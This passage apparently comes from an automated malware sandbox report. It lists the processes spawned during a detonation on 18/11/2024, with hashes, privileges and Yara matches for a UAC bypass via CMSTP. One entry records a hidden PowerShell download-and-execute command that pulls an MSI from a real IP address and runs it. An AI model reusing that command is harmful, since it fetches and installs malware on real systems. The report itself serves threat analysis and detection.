                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                            Start time:15:01:13
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:15:01:13
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;
                                                                                                                                                                                            Imagebase:0x7ff7582a0000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:15:01:13
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:15:01:25
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\users\public\2as.msi"
                                                                                                                                                                                            Imagebase:0x7ff7992a0000
                                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:15:01:25
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                            Imagebase:0x7ff7992a0000
                                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                            Start time:15:01:26
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Initiate\pyexec.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Initiate\pyexec.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:29'152 bytes
                                                                                                                                                                                            MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2069622141.00000000037B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:15:01:29
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:29'152 bytes
                                                                                                                                                                                            MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:15:01:32
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2201134854.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:15:01:32
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:15:01:43
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:29'152 bytes
                                                                                                                                                                                            MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:15:01:46
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:15:01:46
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            No disassembly